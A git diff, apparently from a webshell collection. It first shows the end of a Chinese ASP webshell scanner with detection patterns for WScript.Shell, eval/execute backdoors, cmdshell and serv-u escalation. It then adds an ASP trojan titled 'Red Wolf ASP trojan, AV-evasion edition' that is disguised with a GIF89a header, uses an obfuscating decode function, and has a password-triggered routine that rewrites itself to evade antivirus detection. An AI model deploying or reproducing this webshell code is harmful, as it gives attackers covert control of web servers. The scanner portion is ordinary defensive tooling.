||||||
|
Call ShowAllFileSF(TmpPath)
|
||||||
|
End If
|
||||||
|
%>
|
||||||
|
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<a href='<%=URL%>'>返回使用其他方式扫描</a><th>WebShell(木马) 扫描结果</th>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td style="padding:5px;line-height:170%;clear:both;font-size:12px">
|
||||||
|
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<td valign="top">
|
||||||
|
<table width="100%" border="1" cellpadding="0" cellspacing="0" style="padding:5px;line-height:170%;clear:both;font-size:12px">
|
||||||
|
<tr>
|
||||||
|
<%If FormRB="koa" Then%>
|
||||||
|
<td width="30%">文件相对路径</td>
|
||||||
|
<td width="18%">特征码</td>
|
||||||
|
<td width="40%">描述</td>
|
||||||
|
<td width="12%">创建/修改时间</td>
|
||||||
|
<%Else%>
|
||||||
|
<td width="60%">文件相对路径</td>
|
||||||
|
<td width="20%">文件创建时间</td>
|
||||||
|
<td width="20%">修改时间</td>
|
||||||
|
<%End If%>
|
||||||
|
</tr>
|
||||||
|
<%=Report%>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</td></tr></table>
|
||||||
|
扫描完毕!一共检查文件夹<font color="#FF0000"><%=SumFolders%></font>个,文件<font color="#FF0000"><%=SumFiles%></font>个,发现可疑点<font color="#FF0000"><%=Sun%></font>个
|
||||||
|
<%
|
||||||
|
Timer2=Timer
|
||||||
|
TheTime=CStr(Int(((Timer2-Timer1)*10000)+0.5)/10)
|
||||||
|
Response.Write ",本页执行共用了"&TheTime&"毫秒 <a href='"&URL&"'>返回使用其他方式扫描</a>"
|
||||||
|
End If
|
||||||
|
End If
|
||||||
|
%>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
<%
|
||||||
|
|
||||||
|
'遍历处理path及其子目录所有文件
|
||||||
|
Sub ShowAllFileKOA(Path)
|
||||||
|
If Not FSO.FolderExists(Path) Then Exit Sub
|
||||||
|
Set f=FSO.GetFolder(Path)
|
||||||
|
Set fc2=f.Files
|
||||||
|
For Each MyFile In fc2
|
||||||
|
On Error Resume Next
|
||||||
|
If LCase(CurrentlyRoot&"\"&FileName)<>Replace(LCase(Path&"\"&MyFile.Name),"\\","\") And CheckExt(FSO.GetExtensionName(Path&"\"&MyFile.Name)) Then
|
||||||
|
Call ScanFile(Path&"\"&MyFile.Name,"")
|
||||||
|
SumFiles=SumFiles+1
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
Set fc=f.SubFolders
|
||||||
|
For Each f1 In fc
|
||||||
|
ShowAllFileKOA Path&"\"&f1.Name
|
||||||
|
SumFolders=SumFolders+1
|
||||||
|
Next
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
'检测文件
|
||||||
|
Sub ScanFile(FilePath,InFile)
|
||||||
|
FilePath=Replace(FilePath,"\\","\")
|
||||||
|
FileCreateDate=GetDateCreate(FilePath)
|
||||||
|
FileModifyDate=GetDateModify(FilePath)
|
||||||
|
If InFile<>"" Then
|
||||||
|
InFile=Replace(InFile,"\\","\")
|
||||||
|
If SearchType=1 Or InStr(LCase(InFile),LCase(WebSiteRoot))>0 Then
|
||||||
|
InFiles="<font color=red>该文件被 "&InFile&" <a href=""http://"&ServerName&ServerPort&"/"&tURLEncode(Replace(Replace(InFile,WebSiteRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(InFile)&""" target=_blank>查看文件代码</a>文件包含执行</font>"
|
||||||
|
ElseIf SearchType=2 Or InStr(LCase(InFile),LCase(CurrentlyRoot))>0 Then
|
||||||
|
InFiles="<font color=red>该文件被 "&InFile&" <a href=""http://"&ServerName&ServerPort&Replace(URL,FileName,"")&tURLEncode(Replace(Replace(InFile,CurrentlyRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(InFile)&""" target=_blank>查看文件代码</a>文件包含执行</font>"
|
||||||
|
Else
|
||||||
|
InFiles="<font color=red>该文件被 "&InFile&" <a href=""?filemanager=showfile&filepath="&tURLEncode(InFile)&""" target=_blank>查看文件代码</a>文件包含执行</font>"
|
||||||
|
End If
|
||||||
|
End If
|
||||||
|
On Error Resume Next
|
||||||
|
Set oFile=FSO.OpenTextFile(FilePath)
|
||||||
|
FileTxt=LCase(oFile.ReadAll())
|
||||||
|
If Err Then Exit Sub End If
|
||||||
|
If Len(FileTxt)>0 Then
|
||||||
|
'特征码检查
|
||||||
|
FileTxt=vbcrlf&FileTxt
|
||||||
|
If SearchType=1 Or InStr(LCase(FilePath),LCase(WebSiteRoot))>0 Then
|
||||||
|
Temp=FilePath&"<br><a href=""http://"&ServerName&ServerPort&"/"&tURLEncode(Replace(Replace(FilePath,WebSiteRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(FilePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
ElseIf SearchType=2 Or InStr(LCase(FilePath),LCase(CurrentlyRoot))>0 Then
|
||||||
|
Temp=FilePath&"<br><a href=""http://"&ServerName&ServerPort&Replace(URL,FileName,"")&tURLEncode(Replace(Replace(FilePath,CurrentlyRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(FilePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
Else
|
||||||
|
Temp=FilePath&"<br><a href=""?filemanager=showfile&filepath="&tURLEncode(FilePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
End If
|
||||||
|
|
||||||
|
'Check "WScript.Shell"
|
||||||
|
If InStr(FileTxt,"wscript.shell") Or InStr(FileTxt,"clsid:72c24dd5-d70a-438b-8a42-98424b88afb8") Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>WScript.Shell 或者 clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8</td><td><font color=red>危险组件,一般被ASP木马利用</font>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
'Check "Shell.Application"
|
||||||
|
If InStr(FileTxt,"shell.application") Or InStr(FileTxt,"clsid:13709620-c279-11ce-a49e-444553540000") Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>Shell.Application 或者 clsid:13709620-C279-11CE-A49E-444553540000</td><td><font color=red>危险组件,一般被ASP木马利用</font>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
'Check .Encode
|
||||||
|
Set regEx=New RegExp
|
||||||
|
regEx.IgnoreCase=True
|
||||||
|
regEx.Global=True
|
||||||
|
regEx.Pattern="\b(?:vbscript|jscript|javascript).encode\b"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>(vbscript|jscript|javascript).Encode</td><td><font color=red>似乎脚本被加密了</font>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
'Check eval backdoor
|
||||||
|
regEx.Pattern="\bEval\b"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>Eval</td><td>eval()函数可以执行任意ASP代码,被一些后门利用。其形式一般是:eval(X)<br>但是javascript代码中也可以使用,有可能是误报。"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
'Check execute backdoor
|
||||||
|
regEx.Pattern="[^.]\bExecute\b"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>Execute</td><td><font color=red>execute()函数可以执行任意ASP代码,被一些后门利用。其形式一般是:execute(X)</font><br>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
|
||||||
|
'查一句话木马(cmdshell)
|
||||||
|
regEx.Pattern="[^.]\bcmdshell\b"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>cmdshell</td><td><font color=red>cmdshell</font><br>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
'查一句话木马(serv-u)
|
||||||
|
regEx.Pattern="[^.]\bserv-u\b"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>serv-u</td><td><font color=red>serv-u提权一般会包含这个字符</font><br>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
'Check .CreateTextFile|.OpenTextFile
|
||||||
|
regEx.Pattern="\.(?:Open|Create)TextFile\b"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td><font color=red>.CreateTextFile|.OpenTextFile</font></td><td>使用了FSO的CreateTextFile|OpenTextFile函数读写文件"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
'Check .SaveToFile
|
||||||
|
regEx.Pattern="\.SaveToFile\b"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td><font color=red>.SaveToFile</font></td><td>使用了Stream的SaveToFile函数写文件"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
'Check .Name=
|
||||||
|
regEx.Pattern="\.Name\s*=\s*(?!=)"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td><font color=red>.Name</font></td><td>使用了FSO的.GetFile|.GetFolder函数的.Name更改文件或文件夹名称"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
|
||||||
|
If InFile<>"" Then
|
||||||
|
MyFileExt=LCase(Right(FilePath,Len(FilePath)-InStrRev(FilePath,".")))
|
||||||
|
If InStr(MyFileExt,"asp")=0 And InStr(MyFileExt,"asa")=0 And InStr(MyFileExt,"cer")=0 And InStr(MyFileExt,"cdx")=0 And InStr(MyFileExt,"inc")=0 And InStr(MyFileExt,"htm")=0 Then
|
||||||
|
Sun=Sun+1
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td><font color=red>Include</font></td><td>包含非ASP("&MyFileExt&")文件"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
End If
|
||||||
|
End If
|
||||||
|
'------------------ End ----------------------------
|
||||||
|
Set regEx=Nothing
|
||||||
|
|
||||||
|
'Check include file|virtual
|
||||||
|
Set regEx=New RegExp
|
||||||
|
regEx.IgnoreCase=True
|
||||||
|
regEx.Global=True
|
||||||
|
regEx.Pattern="<!--[\s ]*#include[\s ]*(?:file|virtual)[\s ]*=[\s ]*(""|')?(.+)\1[\s ]*-->"
|
||||||
|
Set Matches=regEx.Execute(FileTxt)
|
||||||
|
For Each Match In Matches
|
||||||
|
tFile=Trim(Replace(regEx.Replace(Match.Value,"$2"),vbCr,""))
|
||||||
|
If Not CheckExt(FSO.GetExtensionName(tFile)) Then
|
||||||
|
Call ScanFile(Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile,FilePath)
|
||||||
|
SumFiles=SumFiles+1
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
Set Matches=Nothing
|
||||||
|
Set regEx=Nothing
|
||||||
|
|
||||||
|
'Check Server.Execute|Transfer
|
||||||
|
Set regEx=New RegExp
|
||||||
|
regEx.IgnoreCase=True
|
||||||
|
regEx.Global=True
|
||||||
|
regEx.Pattern="Server.(?:Execute|Transfer)\s*\(\s*""(.+)"""
|
||||||
|
Set Matches=regEx.Execute(FileTxt)
|
||||||
|
For Each Match In Matches
|
||||||
|
tFile=Trim(regEx.Replace(Match.Value,"$1"))
|
||||||
|
If Not CheckExt(FSO.GetExtensionName(tFile)) Then
|
||||||
|
Call ScanFile(Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile,FilePath)
|
||||||
|
SumFiles=SumFiles+1
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
Set Matches=Nothing
|
||||||
|
Set regEx=Nothing
|
||||||
|
|
||||||
|
'Check Server.Execute|Transfer
|
||||||
|
Set regEx=New RegExp
|
||||||
|
regEx.IgnoreCase=True
|
||||||
|
regEx.Global=True
|
||||||
|
regEx.Pattern="Server.(?:Execute|Transfer)\s*\(\s*[^""].+\)"
|
||||||
|
If regEx.Test(FileTxt) Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>Server.Execute</td><td><font color=red>不能跟踪检查Server.execute()函数执行的文件。请管理员自行检查</font></td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End If
|
||||||
|
Set regEx=Nothing
|
||||||
|
|
||||||
|
'Check RunatScript
|
||||||
|
Set regEx=New RegExp
|
||||||
|
regEx.IgnoreCase=True
|
||||||
|
regEx.Global=True
|
||||||
|
regEx.Pattern="<scr"&"ipt[^>]*?runat\s*=\s*(""|')?server\1[\s\S]*?>"
|
||||||
|
Set Matches=regEx.Execute(FileTxt)
|
||||||
|
For Each Match In Matches
|
||||||
|
MatchValue=Trim(Replace(Match.Value,vbNewLine," "))
|
||||||
|
TmpLake2=Mid(MatchValue,1,InStr(MatchValue,">"))
|
||||||
|
srcSeek=InStr(1,TmpLake2,"src",1)
|
||||||
|
If srcSeek>0 Then
|
||||||
|
srcSeek2=InStr(srcSeek,TmpLake2,"=")
|
||||||
|
myteststr=Mid(MatchValue,srcSeek,srcSeek2)
|
||||||
|
For i=1 To 50
|
||||||
|
Tmp=Mid(TmpLake2,srcSeek2+i,1)
|
||||||
|
If Tmp<>" " And Tmp<>chr(9) And Tmp<>vbCrLf Then
|
||||||
|
Exit For
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
If Tmp="""" Then
|
||||||
|
TmpName=Mid(TmpLake2,srcSeek2+i+1,InStr(srcSeek2+i+1,TmpLake2,"""")-srcSeek2-i-1)
|
||||||
|
Else
|
||||||
|
If InStr(srcSeek2+i+1,TmpLake2," ")>0 Then TmpName=Mid(TmpLake2,srcSeek2+i,InStr(srcSeek2+i+1,TmpLake2," ")-srcSeek2-i) Else TmpName=TmpLake2
|
||||||
|
If InStr(TmpName,chr(9))>0 Then TmpName=Mid(TmpName,1,InStr(1,TmpName,chr(9))-1)
|
||||||
|
If InStr(TmpName,vbCrLf)>0 Then TmpName=Mid(TmpName,1,InStr(1,TmpName,vbCrlf)-1)
|
||||||
|
If InStr(TmpName,">")>0 Then TmpName=Mid(TmpName,1,InStr(1,TmpName,">")-1)
|
||||||
|
End If
|
||||||
|
Call ScanFile(Mid(FilePath,1,InStrRev(FilePath,"\"))&TmpName,FilePath)
|
||||||
|
SumFiles=SumFiles+1
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
Set Matches=Nothing
|
||||||
|
Set regEx=Nothing
|
||||||
|
|
||||||
|
End If
|
||||||
|
Set oFile=Nothing
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
'检查文件后缀,如果与预定的匹配即返回TRUE
|
||||||
|
Function CheckExt(FileExt)
|
||||||
|
If DimFileExt="*" Then CheckExt=True
|
||||||
|
Ext=Split(DimFileExt,",")
|
||||||
|
For i=0 To Ubound(Ext)
|
||||||
|
If LCase(FileExt)=Ext(i) Then
|
||||||
|
CheckExt=True
|
||||||
|
Exit Function
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Function GetDateModify(FilePath)
|
||||||
|
Set f=FSO.GetFile(FilePath)
|
||||||
|
s=f.DateLastModified
|
||||||
|
Set f=Nothing
|
||||||
|
GetDateModify=s
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Function GetDateCreate(FilePath)
|
||||||
|
Set f=FSO.GetFile(FilePath)
|
||||||
|
s=f.DateCreated
|
||||||
|
Set f=Nothing
|
||||||
|
GetDateCreate=s
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Function tURLEncode(Str)
|
||||||
|
Temp=Replace(Str,"%","%25")
|
||||||
|
Temp=Replace(Temp,"#","%23")
|
||||||
|
Temp=Replace(Temp,"&","%26")
|
||||||
|
Temp=Replace(Temp,"+","%2B")
|
||||||
|
tURLEncode=Temp
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Function HeightLightCode(Str)
|
||||||
|
HLCStr="<span style='color:#F00;background-color:#FF0;font-size:30px;'>"
|
||||||
|
Set regEx=New RegExp
|
||||||
|
regEx.IgnoreCase=True
|
||||||
|
regEx.Global=True
|
||||||
|
regEx.Pattern="([^.]\bExecute)\b|\b(Eval)\b|(\.Name\s*=\s*(?!=))"
|
||||||
|
Temp=regEx.replace(Str,HLCStr&"$1$2$3</span>")
|
||||||
|
Set regEx=Nothing
|
||||||
|
|
||||||
|
Temp=Replace(Temp,"wscript.shell",HLCStr&"wscript.shell</span>")
|
||||||
|
Temp=Replace(Temp,"shell.application",HLCStr&"shell.application</span>")
|
||||||
|
Temp=Replace(Temp,".encode",HLCStr&".encode</span>")
|
||||||
|
Temp=Replace(Temp,"cmdshell",HLCStr&"cmdshell</span>")
|
||||||
|
Temp=Replace(Temp,"serv-u",HLCStr&"serv-u</span>")
|
||||||
|
Temp=Replace(Temp,".createtextfile",HLCStr&".createtextfile</span>")
|
||||||
|
Temp=Replace(Temp,".opentextfile",HLCStr&".opentextfile</span>")
|
||||||
|
Temp=Replace(Temp,".savetofile",HLCStr&".savetofile</span>")
|
||||||
|
Temp=Replace(Temp,"clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b",HLCStr&"clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b</span>")
|
||||||
|
Temp=Replace(Temp,"clsid:13709620-c279-11ce-a49e-444553540000",HLCStr&"clsid:13709620-c279-11ce-a49e-444553540000</span>")
|
||||||
|
Temp=Replace(Temp,"clsid:0d43fe01-f093-11cf-8940-00a0c9054228",HLCStr&"clsid:0d43fe01-f093-11cf-8940-00a0c9054228</span>")
|
||||||
|
Temp=Replace(Temp,"clsid:72c24dd5-d70a-438b-8a42-98424b88afb8",HLCStr&"clsid:72c24dd5-d70a-438b-8a42-98424b88afb8</span>")
|
||||||
|
HeightLightCode=Temp
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Sub ChkErr(Err)
|
||||||
|
If Err Then
|
||||||
|
Response.Write"<p>错误:"&Err.Description&"</p><p>错误源:"&Err.Source&"</p>"
|
||||||
|
Err.Clear
|
||||||
|
Set oFile=Nothing
|
||||||
|
Set FSO=Nothing
|
||||||
|
Response.End
|
||||||
|
End If
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Sub ShowAllFileSF(Path)
|
||||||
|
If Not FSO.FolderExists(Path) Then Exit Sub
|
||||||
|
Set f=FSO.GetFolder(Path)
|
||||||
|
Set fc2=f.Files
|
||||||
|
For Each MyFile In fc2
|
||||||
|
On Error Resume Next
|
||||||
|
If LCase(CurrentlyRoot&"\"&FileName)<>Replace(LCase(Path&"\"&MyFile.Name),"\\","\") And CheckExt(FSO.GetExtensionName(Path&"\"&MyFile.Name)) Then
|
||||||
|
Call IsFind(Path&"\"&MyFile.Name)
|
||||||
|
SumFiles=SumFiles+1
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
Set fc=f.SubFolders
|
||||||
|
For Each f1 In fc
|
||||||
|
ShowAllFileSF Path&"\"&f1.Name
|
||||||
|
SumFolders=SumFolders+1
|
||||||
|
Next
|
||||||
|
Set fc=Nothing
|
||||||
|
Set fc2=Nothing
|
||||||
|
Set f=Nothing
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Sub IsFind(ThePath)
|
||||||
|
TheDate=GetDateModify(ThePath)
|
||||||
|
On Error Resume Next
|
||||||
|
TheTmp=Mid(TheDate,1,InStr(TheDate," ")-1)
|
||||||
|
If Err Then Exit Sub
|
||||||
|
|
||||||
|
xDate=Split(FormSD,";")
|
||||||
|
|
||||||
|
If FormSD="ALL" Then ALLTime=True
|
||||||
|
|
||||||
|
For i=0 To Ubound(xDate)
|
||||||
|
If InStr(TheTmp,xDate(i))>0 Or ALLTime=True Then
|
||||||
|
If SearchType=1 Or InStr(Replace(LCase(ThePath),"\\","\"),LCase(WebSiteRoot))>0 Then
|
||||||
|
Temp=ThePath&"<br><a href=""http://"&ServerName&ServerPort&"/"&tURLEncode(Replace(Replace(Replace(ThePath,"\\","\"),WebSiteRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
ElseIf SearchType=2 Or InStr(Replace(LCase(ThePath),"\\","\"),LCase(CurrentlyRoot))>0 Then
|
||||||
|
Temp=ThePath&"<br><a href=""http://"&ServerName&ServerPort&Replace(URL,FileName,"")&tURLEncode(Replace(Replace(Replace(ThePath,"\\","\"),CurrentlyRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
Else
|
||||||
|
Temp=ThePath&"<br><a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
End If
|
||||||
|
If Request.Form("Search_Content")<>"" Then
|
||||||
|
Set oFile=FSO.OpenTextFile(ThePath,1,false,-2)
|
||||||
|
FileTxt=LCase(oFile.ReadAll())
|
||||||
|
If InStr(FileTxt,LCase(Request.Form("Search_Content")))>0 Then
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>"&GetDateCreate(ThePath)&"</td><td>"&TheDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
Exit Sub
|
||||||
|
End If
|
||||||
|
oFile.close()
|
||||||
|
Set oFile=Nothing
|
||||||
|
Else
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>"&GetDateCreate(ThePath)&"</td><td>"&TheDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
Exit Sub
|
||||||
|
End If
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Sub ShowAllFileQT(Path)
|
||||||
|
If Not FSO.FolderExists(Path) Then Exit Sub
|
||||||
|
Set f=FSO.GetFolder(Path)
|
||||||
|
Set fc2=f.Files
|
||||||
|
For Each MyFile In fc2
|
||||||
|
On Error Resume Next
|
||||||
|
TmpDot=InStrRev(Path&"\"&MyFile.Name,".")
|
||||||
|
TmpBackSlash=InStrRev(Path&"\"&MyFile.Name,"\")
|
||||||
|
TmpSlash=InStrRev(Path&"\"&MyFile.Name,"/")
|
||||||
|
If TmpBackSlash>TmpDot Or TmpSlash>TmpDot Then
|
||||||
|
TempFile=LCase(Path&"\"&MyFile.Name)
|
||||||
|
Else
|
||||||
|
TempFile=LCase(Left(Path&"\"&MyFile.Name,InStrRev(Path&"\"&MyFile.Name,".")-1))
|
||||||
|
End If
|
||||||
|
If InStr(TempFile,".asp")<>0 Or InStr(TempFile,".asa")<>0 Or InStr(TempFile,".cer")<>0 Or InStr(TempFile,".cdx")<>0 Then
|
||||||
|
Call IsFindAsp(Path&"\"&MyFile.Name)
|
||||||
|
End If
|
||||||
|
SumFiles=SumFiles+1
|
||||||
|
Next
|
||||||
|
Set fc=f.SubFolders
|
||||||
|
For Each f1 In fc
|
||||||
|
ShowAllFileQT Path&"\"&f1.Name
|
||||||
|
SumFolders=SumFolders+1
|
||||||
|
Next
|
||||||
|
Set fc=Nothing
|
||||||
|
Set fc2=Nothing
|
||||||
|
Set f=Nothing
|
||||||
|
End Sub
|
||||||
|
Sub IsFindAsp(ThePath)
|
||||||
|
TheDate=GetDateModify(ThePath)
|
||||||
|
On Error Resume Next
|
||||||
|
If SearchType=1 Or InStr(Replace(LCase(ThePath),"\\","\"),LCase(WebSiteRoot))>0 Then
|
||||||
|
Temp=ThePath&"<br><a href=""http://"&ServerName&ServerPort&"/"&tURLEncode(Replace(Replace(Replace(ThePath,"\\","\"),WebSiteRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
ElseIf SearchType=2 Or InStr(Replace(LCase(ThePath),"\\","\"),LCase(CurrentlyRoot))>0 Then
|
||||||
|
Temp=ThePath&"<br><a href=""http://"&ServerName&ServerPort&Replace(URL,FileName,"")&tURLEncode(Replace(Replace(Replace(ThePath,"\\","\"),CurrentlyRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
Else
|
||||||
|
Temp=ThePath&"<br><a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
|
||||||
|
End If
|
||||||
|
Report=Report&"<tr><td>"&Temp&"</td><td>"&GetDateCreate(ThePath)&"</td><td>"&TheDate&"</td></tr>"
|
||||||
|
Sun=Sun+1
|
||||||
|
End Sub
|
||||||
|
Set FSO=Nothing
|
||||||
|
%>
|
41
asp/luoss.asp.txt
Normal file
41
asp/luoss.asp.txt
Normal file
File diff suppressed because one or more lines are too long
80
asp/nonoseed0121.asp.txt
Normal file
80
asp/nonoseed0121.asp.txt
Normal file
|
@ -0,0 +1,80 @@
|
||||||
|
<gif89a>
|
||||||
|
<Title>红狼ASP木马--Anfly免杀版</Title>
|
||||||
|
<%Dim objfSo%>
|
||||||
|
<% dim user
|
||||||
|
user="asp.asp"%><%''将""中的东东改成你木马保存的文件名不要使用dst 或者exe&cute%>
|
||||||
|
<%Dim fdata%>
|
||||||
|
<%Dim objCountFile%>
|
||||||
|
<%on error resume next%>
|
||||||
|
<%
|
||||||
|
Function DecodeFun(MidStr)
|
||||||
|
MidStr = Replace(MidStr, "#!^$W", "s")
|
||||||
|
MidStr = Replace(MidStr, "人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶", "<br>")
|
||||||
|
MidStr = Replace(MidStr, "#sdf", "End If")
|
||||||
|
MidStr = Replace(MidStr, "*&*s", ">")
|
||||||
|
MidStr = Replace(MidStr, "#!@$", "<")
|
||||||
|
MidStr = Replace(MidStr, "h45as", "(")
|
||||||
|
MidStr = Replace(MidStr, "w$@s", ")")
|
||||||
|
MidStr = Replace(MidStr, "a&d%&", Chr(34))
|
||||||
|
DecodeFun = MidStr
|
||||||
|
End Function
|
||||||
|
%>
|
||||||
|
<%
|
||||||
|
pass=request("pass")
|
||||||
|
if pass="open" then
|
||||||
|
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
|
||||||
|
Set objCountFile = objFSO.OpenTextFile(Server.MapPath(user),1,True)
|
||||||
|
FiletempData = objCountFile.ReadAll
|
||||||
|
objCountFile.Close
|
||||||
|
FiletempData=Replace(FiletempData,"dst","exe"&"cute")
|
||||||
|
Set objCountFile=objFSO.CreateTextFile(Server.MapPath(user),True)
|
||||||
|
objCountFile.Write FiletempData
|
||||||
|
objCountFile.Close
|
||||||
|
Set objCountFile=Nothing
|
||||||
|
Set objFSO = Nothing
|
||||||
|
response.write "木马防杀解除"
|
||||||
|
end if
|
||||||
|
if pass="close" then
|
||||||
|
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
|
||||||
|
Set objCountFile = objFSO.OpenTextFile(Server.MapPath(user),1,True)
|
||||||
|
FiletempData = objCountFile.ReadAll
|
||||||
|
objCountFile.Close
|
||||||
|
FiletempData=Replace(FiletempData,"exe"&"cute","dst")
|
||||||
|
Set objCountFile=objFSO.CreateTextFile(Server.MapPath(user),True)
|
||||||
|
objCountFile.Write FiletempData
|
||||||
|
objCountFile.Close
|
||||||
|
Set objCountFile=Nothing
|
||||||
|
Set objFSO = Nothing
|
||||||
|
response.write "木马防杀完毕"
|
||||||
|
end if
|
||||||
|
%>
|
||||||
|
